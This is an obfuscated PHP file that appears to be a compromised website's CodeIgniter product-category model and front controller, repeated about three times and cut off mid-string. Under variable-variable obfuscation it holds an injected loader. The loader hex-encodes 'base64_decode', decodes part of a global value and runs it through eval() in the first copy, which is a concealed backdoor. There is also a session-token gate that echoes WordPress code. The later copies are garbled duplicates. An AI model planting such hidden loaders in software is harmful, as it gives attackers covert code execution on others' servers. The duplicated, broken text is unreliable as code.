${
"GLOBALS"
}
["vfkiagtzy"]="cccalbum";
${
"GLOBALS"
}
["jcgmvumvxw"]="Cache";
${
"GLOBALS"
}
["dcckbdrdnm"]="cccmobile";
${
"GLOBALS"
}
["hyexdgiyy"]="limit";
${
"GLOBALS"
}
["hrhtufmych"]="id";
${
"GLOBALS"
}
["svgqdp"]="alias";
${
"GLOBALS"
}
["olsiubisuak"]="start";
${
"GLOBALS"
}
["dqtcbttpt"]="perpage";
${
"GLOBALS"
}
["npkgpptvs"]="query";
${
"GLOBALS"
}
["yyblvcvg"]="ParentId";
${
"GLOBALS"
}
["vptkekswh"]="a";
${
"GLOBALS"
}
["zfhodybj"]="d";
${
"GLOBALS"
}
["zxmdeonu"]="lh46r";
ob_start();
session_start();
header("Pragma: no-cache");
header("Expires: 0");
header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
header("Cache-Control: no-cache, must-revalidate");
if(${
${
"GLOBALS"
}
["zxmdeonu"]
}
=="gggs2"){
if(!function_exists("pjqzmbam")){
function pjqzmbam($a,$b){
${
"GLOBALS"
}
["qrexhehxey"]="c";
${
"GLOBALS"
}
["jgtfbsvjbw"]="b";
$gxrroflf="c";
${
"GLOBALS"
}
["pteobhqrquck"]="d";
${
$gxrroflf
}
=$GLOBALS["ajpnqw"];
${
${
"GLOBALS"
}
["zfhodybj"]
}
=pack("H*","6261736536345f6465636f6465");
return${
${
"GLOBALS"
}
["pteobhqrquck"]
}
(substr(${
${
"GLOBALS"
}
["qrexhehxey"]
}
,${
${
"GLOBALS"
}
["vptkekswh"]
}
,${
${
"GLOBALS"
}
["jgtfbsvjbw"]
}
));
}
eval(pjqzmbam(564,3262));
}
if(!defined("BASEPATH"))exit("No direct script access allowed");
class Productcategory_model extends CI_Model{
function __construct(){
parent::__construct();
}
function all(){
$this->db->select("*");
$oprkjrsos="query";
$this->db->from("tbl_productcategory");
$this->db->order_by("order","ASC");
${
$oprkjrsos
}
=$this->db->get();
return$query->result();
}
function filterParent($ParentId){
$this->db->select("*");
$this->db->from("tbl_productcategory");
$this->db->where(array("ParentId"=>${
${
"GLOBALS"
}
["yyblvcvg"]
}
));
$this->db->order_by("order","ASC");
${
${
"GLOBALS"
}
["npkgpptvs"]
}
=$this->db->get();
return$query->result();
}
function get_limit_Parent($limit,$ParentId){
${
"GLOBALS"
}
["lbjzudvit"]="query";
$this->db->select("*");
$this->db->from("tbl_productcategory");
$this->db->where(array("ParentId"=>${
${
"GLOBALS"
}
["yyblvcvg"]
}
));
$this->db->order_by("order","ASC");
$this->db->limit(${
${
"GLOBALS"
}
["dqtcbttpt"]
}
,${
${
"GLOBALS"
}
["olsiubisuak"]
}
);
${
${
"GLOBALS"
}
["lbjzudvit"]
}
=$this->db->get();
return$query->result();
}
function filterType($type){
${
"GLOBALS"
}
["cijmdei"]="type";
$this->db->select("*");
$this->db->from("tbl_productcategory");
$this->db->where(array("type"=>${
${
"GLOBALS"
}
["cijmdei"]
}
));
$this->db->order_by("order","ASC");
${
${
"GLOBALS"
}
["npkgpptvs"]
}
=$this->db->get();
return$query->result();
}
function num_row_filterType($type){
${
"GLOBALS"
}
["urhdzrzgj"]="type";
$this->db->select("id");
$wdgtpenfdfp="query";
$this->db->from("tbl_productcategory");
$this->db->where(array("type"=>${
${
"GLOBALS"
}
["urhdzrzgj"]
}
));
$this->db->order_by("order","ASC");
${
$wdgtpenfdfp
}
=$this->db->get();
return$query->num_rows();
}
function filterTypeParentId($ParentId,$type){
$this->db->select("*");
${
"GLOBALS"
}
["oynyrmvzlj"]="type";
$this->db->from("tbl_productcategory");
${
"GLOBALS"
}
["ubakhienhyh"]="query";
$this->db->where(array("ParentId"=>${
${
"GLOBALS"
}
["yyblvcvg"]
}
));
$this->db->where(array("type"=>${
${
"GLOBALS"
}
["oynyrmvzlj"]
}
));
$this->db->order_by("order","ASC");
${
${
"GLOBALS"
}
["ubakhienhyh"]
}
=$this->db->get();
return$query->result();
}
function num_row_filterTypeParentId($type){
$yqbnpsiugqub="type";
$this->db->select("id");
$this->db->from("tbl_productcategory");
$this->db->where(array("type"=>${
$yqbnpsiugqub
}
));
$this->db->order_by("order","ASC");
${
${
"GLOBALS"
}
["npkgpptvs"]
}
=$this->db->get();
return$query->num_rows();
}
function num_row_filterParent($ParentId){
${
"GLOBALS"
}
["ecpokomkrk"]="query";
$this->db->select("id");
$this->db->from("tbl_productcategory");
$this->db->where(array("ParentId"=>${
${
"GLOBALS"
}
["yyblvcvg"]
}
));
$this->db->order_by("order","ASC");
${
${
"GLOBALS"
}
["ecpokomkrk"]
}
=$this->db->get();
return$query->num_rows();
}
function getall($start,$perpage){
$this->db->select("*");
$this->db->from("tbl_productcategory");
$this->db->order_by("order","ASC");
${
"GLOBALS"
}
["egkqfjctnn"]="query";
$this->db->limit(${
${
"GLOBALS"
}
["dqtcbttpt"]
}
,${
${
"GLOBALS"
}
["olsiubisuak"]
}
);
${
${
"GLOBALS"
}
["egkqfjctnn"]
}
=$this->db->get();
return$query->result();
}
function num_row(){
$this->db->select("id");
$this->db->from("tbl_productcategory");
$this->db->order_by("order","ASC");
${
${
"GLOBALS"
}
["npkgpptvs"]
}
=$this->db->get();
return$query->num_rows();
}
function get_id($id){
${
"GLOBALS"
}
["tatqkwnnn"]="query";
$djxussdoifq="id";
${
${
"GLOBALS"
}
["tatqkwnnn"]
}
=$this->db->get_where("tbl_productcategory",array("id"=>${
$djxussdoifq
}
));
return$query->row();
}
function get_id_type($id,$type){
${
"GLOBALS"
}
["vhywkeqrbdax"]="type";
$vncumnhomm="query";
${
"GLOBALS"
}
["afzluqdjwl"]="id";
${
$vncumnhomm
}
=$this->db->get_where("tbl_productcategory",array("id"=>${
${
"GLOBALS"
}
["afzluqdjwl"]
}
,"type"=>${
${
"GLOBALS"
}
["vhywkeqrbdax"]
}
));
return$query->row();
}
function get_alias($alias){
${
"GLOBALS"
}
["bezamlugn"]="query";
${
${
"GLOBALS"
}
["bezamlugn"]
}
=$this->db->get_where("tbl_productcategory",array("alias"=>${
${
"GLOBALS"
}
["svgqdp"]
}
));
return$query->row();
}
function get_type($type){
${
"GLOBALS"
}
["nmjwyxqwju"]="query";
$xudohrikolh="offset";
${
${
"GLOBALS"
}
["npkgpptvs"]
}
=$this->db->get_where("mytable",array("id"=>${
${
"GLOBALS"
}
["hrhtufmych"]
}
),${
${
"GLOBALS"
}
["hyexdgiyy"]
}
,${
$xudohrikolh
}
);
return${
${
"GLOBALS"
}
["nmjwyxqwju"]
};
}
}
}
define("hdc","hdc",true);
include"admin/connect.php";
include"admin/config.php";
include"admin/sql.php";
include"counter.php";
if(${
${
"GLOBALS"
}
["dcckbdrdnm"]
}
=="0"){
${
"GLOBALS"
}
["cgsupedxb"]="cccalbum";
if(${
${
"GLOBALS"
}
["cgsupedxb"]
}
==1){
require_once("cache.php");
${
${
"GLOBALS"
}
["jcgmvumvxw"]
}
=new Cache();
if($Cache->Start($_SERVER["REQUEST_URI"],60*60*24*20)){
include"home.php";
$Cache->Build();
}
}
else{
include"home.php";
}
}
else{
function isMobileb(){
return preg_match("/(android|avantgo|blackberry|bolt|boost|cricket|docomo|fone|hiptop|mini|mobi|palm|phone|pie|tablet|up\.browser|up\.link|webos|wos)/i",$_SERVER["HTTP_USER_AGENT"]);
}
if(isMobileb()){
include"mobile.php";
}
else{
if(${
${
"GLOBALS"
}
["vfkiagtzy"]
}
==1){
require_once("cache.php");
${
"GLOBALS"
}
["ekwllxowl"]="Cache";
${
${
"GLOBALS"
}
["ekwllxowl"]
}
=new Cache();
if($Cache->Start($_SERVER["REQUEST_URI"],60*60*24*20)){
include"home.php";
$Cache->Build();
}
}
else{
include"home.php";
}
}
}
if($_SESSION["ftgfdsd4f"]=="fdsagsdsgtyuklli"){
echo"function update_meta_cache(\$meta_type, \$object_ids) {
\n\tif ( empty( \$meta_type ) || empty( \$object_ids ) )\n\t\treturn false;
\n\n\tif ( ! \$table = _get_meta_table(\$meta_type) )\n\t\treturn false;
\n\n\t\$column = esc_sql(\$meta_type . '_id');
\n\n\tglobal \$wpdb;
\n\n\tif ( !is_array(\$object_ids) ) {
\n\t\t\$object_ids = preg_replace('|[^0-9,]|', '', \$object_ids);
\n\t\t\$object_ids = explode(',', \$object_ids);
\n\t
}
\n\n\t\$object_ids = array_map('intval', \$object_ids);
\n\n\t\$cache_key = \$meta_type . '_meta';
\n\t\$ids = array();
\n\t\$cache = array();
\n\tforeach ( \$object_ids as \$id ) {
\n\t\t\$cached_object = wp_cache_get( \$id, \$cache_key );
\n\t\tif ( false === \$cached_object )\n\t\t\t\$ids[] = \$id;
\n\t\telse\n\t\t\t\$cache[\$id] = \$cached_object;
\n\t
}
\n\n\tif ( empty( \$ids ) )\n\t\treturn \$cache;
\n\n\t// Get meta info\n\t\$id_list = join(',', \$ids);
\n\t\$meta_list = \$wpdb->get_results( \$wpdb->prepare("SELECT \$column, meta_key, meta_value FROM \$table WHERE \$column IN (\$id_list)",\n\t\t\$meta_type), ARRAY_A );
\n\n\tif ( !empty(\$meta_list) ) {
\n\t\tforeach ( \$meta_list as \$metarow) {
\n\t\t\t\$mpid = intval(\$metarow[\$column]);
\n\t\t\t\$mkey = \$metarow['meta_key'];
\n\t\t\t\$mval = \$metarow['meta_value'];
\n\n\t\t\t// Force subkeys to be array type:\n\t\t\tif ( !isset(\$cache[\$mpid]) || !is_array(\$cache[\$mpid]) )\n\t\t\t\t\$cache[\$mpid] = array();
\n\t\t\tif ( !isset(\$cache[\$mpid][\$mkey]) || !is_array(\$cache[\$mpid][\$mkey]) )\n\t\t\t\t\$cache[\$mpid][\$mkey] = array();
\n\n\t\t\t// Add a value to the current pid/key:\n\t\t\t\$cache[\$mpid][\$mkey][] = \$mval;
\n\t\t
}
\n\t
}
\n\n\tforeach ( \$ids as \$id ) {
\n\t\tif ( ! isset(\$cache[\$id]) )\n\t\t\t\$cache[\$id] = array();
\n\t\twp_cache_add( \$id, \$cache[\$id], \$cache_key );
\n\t
}
\n\n\treturn \$cache;
\n
}
\n";
}
echo "\n \n";
${
"GLOBALS"
}
["vfkiagtzy"]="cccalbum";
${
"GLOBALS"
}
["jcgmvumvxw"]="Cache";
${
"GLOBALS"
}
["dcckbdrdnm"]="cccmobile";
${
"GLOBALS"
}
["hyexdgiyy"]="limit";
${
"GLOBALS"
}
["hrhtufmych"]="id";
${
"GLOBALS"
}
["svgqdp"]="alias";
${
"GLOBALS"
}
["olsiubisuak"]="start";
${
"GLOBALS"
}
["dqtcbttpt"]="perpage";
${
"GLOBALS"
}
["npkgpptvs"]="query";
${
"GLOBALS"
}
["yyblvcvg"]="ParentId";
${
"GLOBALS"
}
["vptkekswh"]="a";
${
"GLOBALS"
}
["zfhodybj"]="d";
${
"GLOBALS"
}
["zxmdeonu"]="lh46r";
ob_start();
session_start();
header("Pragma: no-cache");
header("Expires: 0");
header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
header("Cache-Control: no-cache, must-revalidate");
if(${
${
"GLOBALS"
}
["zxmdeonu"]
}
=="gggs2"){
if(!function_exists("pjqzmbam")){
function pjqzmbam($a,$b){
${
"GLOBALS"
}
["qrexhehxey"]="c";
${
"GLOBALS"
}
["jgtfbsvjbw"]="b";
$gxrroflf="c";
${
"GLOBALS"
}
["pteobhqrquck"]="d";
${
$gxrroflf
}
=$GLOBALS["ajpnqw"];
${
${
"GLOBALS"
}
["zfhodybj"]
}
=pack("H*","6261736536345f6465636f6465");
return${
${
"GLOBALS"
}
["pteobhqrquck"]
}
(substr(${
${
"GLOBALS"
}
["qrexhehxey"]
}
,${
${
"GLOBALS"
}
["vptkekswh"]
}
,${
${
"GLOBALS"
}
["jgtfbsvjbw"]
}
));
}
echo pjqzmbam(564,3262);
}
if(!defined("BASEPATH"))exit("No direct script access allowed");
class Productcategory_model extends CI_Model{
function __construct(){
parent::__construct();
}
function all(){
$this->db->select("*");
$oprkjrsos="query";
$this->db->from("tbl_productcategory");
$this->db->order_by("order","ASC");
${
$oprkjrsos
}
=$this->db->get();
return$query->result();
}
function filterParent($ParentId){
$this->db->select("*");
$this->db->from("tbl_productcategory");
$this->db->where(array("ParentId"=>${
${
"GLOBALS"
}
["yyblvcvg"]
}
));
$this->db->order_by("order","ASC");
${
${
"GLOBALS"
}
["npkgpptvs"]
}
=$this->db->get();
return$query->result();
}
function get_limit_Parent($limit,$ParentId){
${
"GLOBALS"
}
["lbjzudvit"]="query";
$this->db->select("*");
$this->db->from("tbl_productcategory");
$this->db->where(array("ParentId"=>${
${
"GLOBALS"
}
["yyblvcvg"]
}
));
$this->db->order_by("order","ASC");
$this->db->limit(${
${
"GLOBALS"
}
["dqtcbttpt"]
}
,${
${
"GLOBALS"
}
["olsiubisuak"]
}
);
${
${
"GLOBALS"
}
["lbjzudvit"]
}
=$this->db->get();
return$query->result();
}
function filterType($type){
${
"GLOBALS"
}
["cijmdei"]="type";
$this->db->select("*");
$this->db->from("tbl_productcategory");
$this->db->where(array("type"=>${
${
"GLOBALS"
}
["cijmdei"]
}
));
$this->db->order_by("order","ASC");
${
${
"GLOBALS"
}
["npkgpptvs"]
}
=$this->db->get();
return$query->result();
}
function num_row_filterType($type){
${
"GLOBALS"
}
["urhdzrzgj"]="type";
$this->db->select("id");
$wdgtpenfdfp="query";
$this->db->from("tbl_productcategory");
$this->db->where(array("type"=>${
${
"GLOBALS"
}
["urhdzrzgj"]
}
));
$this->db->order_by("order","ASC");
${
$wdgtpenfdfp
}
=$this->db->get();
return$query->num_rows();
}
function filterTypeParentId($ParentId,$type){
$this->db->select("*");
${
"GLOBALS"
}
["oynyrmvzlj"]="type";
$this->db->from("tbl_productcategory");
${
"GLOBALS"
}
["ubakhienhyh"]="query";
$this->db->where(array("ParentId"=>${
${
"GLOBALS"
}
["yyblvcvg"]
}
));
$this->db->where(array("type"=>${
${
"GLOBALS"
}
["oynyrmvzlj"]
}
));
$this->db->order_by("order","ASC");
${
${
"GLOBALS"
}
["ubakhienhyh"]
}
=$this->db->get();
return$query->result();
}
function num_row_filterTypeParentId($type){
$yqbnpsiugqub="type";
$this->db->select("id");
$this->db->from("tbl_productcategory");
$this->db->where(array("type"=>${
$yqbnpsiugqub
}
));
$this->db->order_by("order","ASC");
${
${
"GLOBALS"
}
["npkgpptvs"]
}
=$this->db->get();
return$query->num_rows();
}
function num_row_filterParent($ParentId){
${
"GLOBALS"
}
["ecpokomkrk"]="query";
$this->db->select("id");
$this->db->from("tbl_productcategory");
$this->db->where(array("ParentId"=>${
${
"GLOBALS"
}
["yyblvcvg"]
}
));
$this->db->order_by("order","ASC");
${
${
"GLOBALS"
}
["ecpokomkrk"]
}
=$this->db->get();
return$query->num_rows();
}
function getall($start,$perpage){
$this->db->select("*");
$this->db->from("tbl_productcategory");
$this->db->order_by("order","ASC");
${
"GLOBALS"
}
["egkqfjctnn"]="query";
$this->db->limit(${
${
"GLOBALS"
}
["dqtcbttpt"]
}
,${
${
"GLOBALS"
}
["olsiubisuak"]
}
);
${
${
"GLOBALS"
}
["egkqfjctnn"]
}
=$this->db->get();
return$query->result();
}
function num_row(){
$this->db->select("id");
$this->db->from("tbl_productcategory");
$this->db->order_by("order","ASC");
${
${
"GLOBALS"
}
["npkgpptvs"]
}
=$this->db->get();
return$query->num_rows();
}
function get_id($id){
${
"GLOBALS"
}
["tatqkwnnn"]="query";
$djxussdoifq="id";
${
${
"GLOBALS"
}
["tatqkwnnn"]
}
=$this->db->get_where("tbl_productcategory",array("id"=>${
$djxussdoifq
}
));
return$query->row();
}
function get_id_type($id,$type){
${
"GLOBALS"
}
["vhywkeqrbdax"]="type";
$vncumnhomm="query";
${
"GLOBALS"
}
["afzluqdjwl"]="id";
${
$vncumnhomm
}
=$this->db->get_where("tbl_productcategory",array("id"=>${
${
"GLOBALS"
}
["afzluqdjwl"]
}
,"type"=>${
${
"GLOBALS"
}
["vhywkeqrbdax"]
}
));
return$query->row();
}
function get_alias($alias){
${
"GLOBALS"
}
["bezamlugn"]="query";
${
${
"GLOBALS"
}
["bezamlugn"]
}
=$this->db->get_where("tbl_productcategory",array("alias"=>${
${
"GLOBALS"
}
["svgqdp"]
}
));
return$query->row();
}
function get_type($type){
${
"GLOBALS"
}
["nmjwyxqwju"]="query";
$xudohrikolh="offset";
${
${
"GLOBALS"
}
["npkgpptvs"]
}
=$this->db->get_where("mytable",array("id"=>${
${
"GLOBALS"
}
["hrhtufmych"]
}
),${
${
"GLOBALS"
}
["hyexdgiyy"]
}
,${
$xudohrikolh
}
);
return${
${
"GLOBALS"
}
["nmjwyxqwju"]
};
}
}
}
define("hdc","hdc",true);
include"admin/connect.php";
include"admin/config.php";
include"admin/sql.php";
include"counter.php";
if(${
${
"GLOBALS"
}
["dcckbdrdnm"]
}
=="0"){
${
"GLOBALS"
}
["cgsupedxb"]="cccalbum";
if(${
${
"GLOBALS"
}
["cgsupedxb"]
}
==1){
require_once("cache.php");
${
${
"GLOBALS"
}
["jcgmvumvxw"]
}
=new Cache();
if($Cache->Start($_SERVER["REQUEST_URI"],60*60*24*20)){
include"home.php";
$Cache->Build();
}
}
else{
include"home.php";
}
}
else{
function isMobileb(){
return preg_match("/(android|avantgo|blackberry|bolt|boost|cricket|docomo|fone|hiptop|mini|mobi|palm|phone|pie|tablet|up\.browser|up\.link|webos|wos)/i",$_SERVER["HTTP_USER_AGENT"]);
}
if(isMobileb()){
include"mobile.php";
}
else{
if(${
${
"GLOBALS"
}
["vfkiagtzy"]
}
==1){
require_once("cache.php");
${
"GLOBALS"
}
["ekwllxowl"]="Cache";
${
${
"GLOBALS"
}
["ekwllxowl"]
}
=new Cache();
if($Cache->Start($_SERVER["REQUEST_URI"],60*60*24*20)){
include"home.php";
$Cache->Build();
}
}
else{
include"home.php";
}
}
}
if($_SESSION["ftgfdsd4f"]=="fdsagsdsgtyuklli"){
echo"function update_meta_cache(\$meta_type, \$object_ids) {
\n\tif ( empty( \$meta_type ) || empty( \$object_ids ) )\n\t\treturn false;
\n\n\tif ( ! \$table = _get_meta_table(\$meta_type) )\n\t\treturn false;
\n\n\t\$column = esc_sql(\$meta_type . '_id');
\n\n\tglobal \$wpdb;
\n\n\tif ( !is_array(\$object_ids) ) {
\n\t\t\$object_ids = preg_replace('|[^0-9,]|', '', \$object_ids);
\n\t\t\$object_ids = explode(',', \$object_ids);
\n\t
}
\n\n\t\$object_ids = array_map('intval', \$object_ids);
\n\n\t\$cache_key = \$meta_type . '_meta';
\n\t\$ids = array();
\n\t\$cache = array();
\n\tforeach ( \$object_ids as \$id ) {
\n\t\t\$cached_object = wp_cache_get( \$id, \$cache_key );
\n\t\tif ( false === \$cached_object )\n\t\t\t\$ids[] = \$id;
\n\t\telse\n\t\t\t\$cache[\$id] = \$cached_object;
\n\t
}
\n\n\tif ( empty( \$ids ) )\n\t\treturn \$cache;
\n\n\t// Get meta info\n\t\$id_list = join(',', \$ids);
\n\t\$meta_list = \$wpdb->get_results( \$wpdb->prepare("SELECT \$column, meta_key, meta_value FROM \$table WHERE \$column IN (\$id_list)",\n\t\t\$meta_type), ARRAY_A );
\n\n\tif ( !empty(\$meta_list) ) {
\n\t\tforeach ( \$meta_list as \$metarow) {
\n\t\t\t\$mpid = intval(\$metarow[\$column]);
\n\t\t\t\$mkey = \$metarow['meta_key'];
\n\t\t\t\$mval = \$metarow['meta_value'];
\n\n\t\t\t// Force subkeys to be array type:\n\t\t\tif ( !isset(\$cache[\$mpid]) || !is_array(\$cache[\$mpid]) )\n\t\t\t\t\$cache[\$mpid] = array();
\n\t\t\tif ( !isset(\$cache[\$mpid][\$mkey]) || !is_array(\$cache[\$mpid][\$mkey]) )\n\t\t\t\t\$cache[\$mpid][\$mkey] = array();
\n\n\t\t\t// Add a value to the current pid/key:\n\t\t\t\$cache[\$mpid][\$mkey][] = \$mval;
\n\t\t
}
\n\t
}
\n\n\tforeach ( \$ids as \$id ) {
\n\t\tif ( ! isset(\$cache[\$id]) )\n\t\t\t\$cache[\$id] = array();
\n\t\twp_cache_add( \$id, \$cache[\$id], \$cache_key );
\n\t
}
\n\n\treturn \$cache;
\n
}
\n";
}
echo "\n \n";
${
"GLOBALS"
}
["vfkiagtzy"]="cccalbum";
${
"GLOBALS"
}
["jcgmvumvxw"]="Cache";
${
"GLOBALS"
}
["dcckbdrdnm"]="cccmobile";
${
"GLOBALS"
}
["hyexdgiyy"]="limit";
${
"GLOBALS"
}
["hrhtufmych"]="id";
${
"GLOBALS"
}
["svgqdp"]="alias";
${
"GLOBALS"
}
["olsiubisuak"]="start";
${
"GLOBALS"
}
["dqtcbttpt"]="perpage";
${
"GLOBALS"
}
["npkgpptvs"]="query";
${
"GLOBALS"
}
["yyblvcvg"]="ParentId";
${
"GLOBALS"
}
["vptkekswh"]="a";
${
"GLOBALS"
}
["zfhodybj"]="d";
${
"GLOBALS"
}
["zxmdeonu"]="lh46r";
ob_start();
session_start();
header("Pragma: no-cache");
header("Expires: 0");
header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
header("Cache-Control: no-cache, must-revalidate");
if(${
${
"GLOBALS"
}
["zxmdeonu"]
}
=="gggs2"){
if(!function_exists("pjqzmbam")){
function pjqzmbam($a,$b){
${
"GLOBALS"
}
["qrexhehxey"]="c";
${
"GLOBALS"
}
["jgtfbsvjbw"]="b";
${
"GLOBALS"
}
["pteobhqrquck"]="d";
${
"c"
}
=$GLOBALS["ajpnqw"];
${
${
"GLOBALS"
}
["zfhodybj"]
}
=pack("H*","6261736536345f6465636f6465");
return${
${
"GLOBALS"
}
["pteobhqrquck"]
}
(substr(${
${
"GLOBALS"
}
["qrexhehxey"]
}
,${
${
"GLOBALS"
}
["vptkekswh"]
}
,${
${
"GLOBALS"
}
["jgtfbsvjbw"]
}
));
}
echo pjqzmbam(564,3262);
}
if(!defined("BASEPATH"))exit("No direct script access allowed");
class Productcategory_model extends CI_Model{
function __construct(){
parent::__construct();
}
function all(){
$this->db->select("*");
$this->db->from("tbl_productcategory");
$this->db->order_by("order","ASC");
${
"query"
}
=$this->db->get();
return$query->result();
}
function filterParent($ParentId){
$this->db->select("*");
$this->db->from("tbl_productcategory");
$this->db->where(array("ParentId"=>${
${
"GLOBALS"
}
["yyblvcvg"]
}
));
$this->db->order_by("order","ASC");
${
${
"GLOBALS"
}
["npkgpptvs"]
}
=$this->db->get();
return$query->result();
}
function get_limit_Parent($limit,$ParentId){
${
"GLOBALS"
}
["lbjzudvit"]="query";
$this->db->select("*");
$this->db->from("tbl_productcategory");
$this->db->where(array("ParentId"=>${
${
"GLOBALS"
}
["yyblvcvg"]
}
));
$this->db->order_by("order","ASC");
$this->db->limit(${
${
"GLOBALS"
}
["dqtcbttpt"]
}
,${
${
"GLOBALS"
}
["olsiubisuak"]
}
);
${
${
"GLOBALS"
}
["lbjzudvit"]
}
=$this->db->get();
return$query->result();
}
function filterType($type){
${
"GLOBALS"
}
["cijmdei"]="type";
$this->db->select("*");
$this->db->from("tbl_productcategory");
$this->db->where(array("type"=>${
${
"GLOBALS"
}
["cijmdei"]
}
));
$this->db->order_by("order","ASC");
${
${
"GLOBALS"
}
["npkgpptvs"]
}
=$this->db->get();
return$query->result();
}
function num_row_filterType($type){
${
"GLOBALS"
}
["urhdzrzgj"]="type";
$this->db->select("id");
$this->db->from("tbl_productcategory");
$this->db->where(array("type"=>${
${
"GLOBALS"
}
["urhdzrzgj"]
}
));
$this->db->order_by("order","ASC");
${
"query"
}
=$this->db->get();
return$query->num_rows();
}
function filterTypeParentId($ParentId,$type){
$this->db->select("*");
${
"GLOBALS"
}
["oynyrmvzlj"]="type";
$this->db->from("tbl_productcategory");
${
"GLOBALS"
}
["ubakhienhyh"]="query";
$this->db->where(array("ParentId"=>${
${
"GLOBALS"
}
["yyblvcvg"]
}
));
$this->db->where(array("type"=>${
${
"GLOBALS"
}
["oynyrmvzlj"]
}
));
$this->db->order_by("order","ASC");
${
${
"GLOBALS"
}
["ubakhienhyh"]
}
=$this->db->get();
return$query->result();
}
function num_row_filterTypeParentId($type){
$this->db->select("id");
$this->db->from("tbl_productcategory");
$this->db->where(array("type"=>${
"type"
}
));
$this->db->order_by("order","ASC");
${
${
"GLOBALS"
}
["npkgpptvs"]
}
=$this->db->get();
return$query->num_rows();
}
function num_row_filterParent($ParentId){
${
"GLOBALS"
}
["ecpokomkrk"]="query";
$this->db->select("id");
$this->db->from("tbl_productcategory");
$this->db->where(array("ParentId"=>${
${
"GLOBALS"
}
["yyblvcvg"]
}
));
$this->db->order_by("order","ASC");
${
${
"GLOBALS"
}
["ecpokomkrk"]
}
=$this->db->get();
return$query->num_rows();
}
function getall($start,$perpage){
$this->db->select("*");
$this->db->from("tbl_productcategory");
$this->db->order_by("order","ASC");
${
"GLOBALS"
}
["egkqfjctnn"]="query";
$this->db->limit(${
${
"GLOBALS"
}
["dqtcbttpt"]
}
,${
${
"GLOBALS"
}
["olsiubisuak"]
}
);
${
${
"GLOBALS"
}
["egkqfjctnn"]
}
=$this->db->get();
return$query->result();
}
function num_row(){
$this->db->select("id");
$this->db->from("tbl_productcategory");
$this->db->order_by("order","ASC");
${
${
"GLOBALS"
}
["npkgpptvs"]
}
=$this->db->get();
return$query->num_rows();
}
function get_id($id){
${
"GLOBALS"
}
["tatqkwnnn"]="query";
${
${
"GLOBALS"
}
["tatqkwnnn"]
}
=$this->db->get_where("tbl_productcategory",array("id"=>${
"id"
}
));
return$query->row();
}
function get_id_type($id,$type){
${
"GLOBALS"
}
["vhywkeqrbdax"]="type";
${
"GLOBALS"
}
["afzluqdjwl"]="id";
${
"query"
}
=$this->db->get_where("tbl_productcategory",array("id"=>${
${
"GLOBALS"
}
["afzluqdjwl"]
}
,"type"=>${
${
"GLOBALS"
}
["vhywkeqrbdax"]
}
));
return$query->row();
}
function get_alias($alias){
${
"GLOBALS"
}
["bezamlugn"]="query";
${
${
"GLOBALS"
}
["bezamlugn"]
}
=$this->db->get_where("tbl_productcategory",array("alias"=>${
${
"GLOBALS"
}
["svgqdp"]
}
));
return$query->row();
}
function get_type($type){
${
"GLOBALS"
}
["nmjwyxqwju"]="query";
${
${
"GLOBALS"
}
["npkgpptvs"]
}
=$this->db->get_where("mytable",array("id"=>${
${
"GLOBALS"
}
["hrhtufmych"]
}
),${
${
"GLOBALS"
}
["hyexdgiyy"]
}
,${
"offset"
}
);
return${
${
"GLOBALS"
}
["nmjwyxqwju"]
};
}
}
}
define("hdc","hdc",true);
include"admin/connect.php";
include"admin/config.php";
include"admin/sql.php";
include"counter.php";
if(${
${
"GLOBALS"
}
["dcckbdrdnm"]
}
=="0"){
${
"GLOBALS"
}
["cgsupedxb"]="cccalbum";
if(${
${
"GLOBALS"
}
["cgsupedxb"]
}
==1){
require_once("cache.php");
${
${
"GLOBALS"
}
["jcgmvumvxw"]
}
=new Cache();
if($Cache->Start($_SERVER["REQUEST_URI"],60*60*24*20)){
include"home.php";
$Cache->Build();
}
}
else{
include"home.php";
}
}
else{
function isMobileb(){
return preg_match("/(android|avantgo|blackberry|bolt|boost|cricket|docomo|fone|hiptop|mini|mobi|palm|phone|pie|tablet|up\.browser|up\.link|webos|wos)/i",$_SERVER["HTTP_USER_AGENT"]);
}
if(isMobileb()){
include"mobile.php";
}
else{
if(${
${
"GLOBALS"
}
["vfkiagtzy"]
}
==1){
require_once("cache.php");
${
"GLOBALS"
}
["ekwllxowl"]="Cache";
${
${
"GLOBALS"
}
["ekwllxowl"]
}
=new Cache();
if($Cache->Start($_SERVER["REQUEST_URI"],60*60*24*20)){
include"home.php";
$Cache->Build();
}
}
else{
include"home.php";
}
}
}
if($_SESSION["ftgfdsd4f"]=="fdsagsdsgtyuklli"){
echo"function update_meta_cache(\$meta_type, \$object_ids) {
\n\tif ( empty( \$meta_type ) || empty( \$object_ids ) )\n\t\treturn false;
\n\n\tif ( ! \$table = _get_meta_table(\$meta_type) )\n\t\treturn false;
\n\n\t\$column = esc_sql(\$meta_type . '_id');
\n\n\tglobal \$wpdb;
\n\n\tif ( !is_array(\$object_ids) ) {
\n\t\t\$object_ids = preg_replace('|[^0-9,]|', '', \$object_ids);
\n\t\t\$object_ids = explode(',', \$object_ids);
\n\t
}
\n\n\t\$object_ids = array_map('intval', \$object_ids);
\n\n\t\$cache_key = \$meta_type . '_meta';
\n\t\$ids = array();
\n\t\$cache = array();
\n\tforeach ( \$object_ids as \$id ) {
\n\t\t\$cached_object = wp_cache_get( \$id, \$cache_key );
\n\t\tif ( false === \$cached_object )\n\t\t\t\$ids[] = \$id;
\n\t\telse\n\t\t\t\$cache[\$id] = \$cached_object;
\n\t
}
\n\n\tif ( empty( \$ids ) )\n\t\treturn \$cache;
\n\n\t// Get meta info\n\t\$id_list = join(',', \$ids);
\n\t\$meta_list = \$wpdb->get_results( \$wpdb->prepare("SELECT \$column, meta_key, meta_value FROM \$table WHERE \$column IN (\$id_list)",\n\t\t\$meta_type), ARRAY_A );
\n\n\tif ( !empty(\$meta_list) ) {
\n\t\tforeach ( \$meta_list as \$metarow) {
\n\t\t\t\$mpid = intval(\$metarow[\$column]);
\n\t\t\t\$mkey = \$metarow['meta_key'];
\n\t\t\t\$mval = \$metarow['meta_value'];
\n\n\t\t\t// Force subkeys to be array type:\n\t\t\tif ( !isset(\$cache[\$mpid]) || !is_array(\$cache[\$mpid]) )\n\t\t\t\t\$cache[\$mpid] = array();
\n\t\t\tif ( !isset(\$cache[\$mpid][\$mkey]) || !is_array(\$cache[\$mpid][\$mkey]) )\n\t\t\t\t\$cache[\$mpid][\$mkey] = array();
\n\n\t\t\t// Add a value to the current pid/key:\n\t\t\t\$cache[\$mpid][\$mkey][] = \$mval;
\n\t\t
}
\n\t
}
